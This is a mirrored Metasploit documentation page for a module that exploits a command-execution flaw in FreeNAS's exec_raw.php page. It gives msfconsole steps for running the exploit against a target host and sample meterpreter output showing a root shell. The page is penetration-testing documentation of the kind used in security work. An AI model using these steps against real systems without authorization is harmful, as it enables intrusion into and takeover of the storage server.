CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/http/freenas_exec_raw.md
Views: 11788

Vulnerable Application

This module exploits an arbitrary command execution flaw in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL to the exec_raw.php page, an attacker may be able to execute arbitrary commands.

NOTE: This module works best with php/meterpreter payloads.

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/multi/http/freenas_exec_raw

  4. Do: set rhost [ip]

  5. Do: run

  6. You should get a shell.

Options

Scenarios

Unknown

meterpreter > sysinfo
Computer: freenas.local
OS      : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010     [email protected]:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username: root (0)
meterpreter >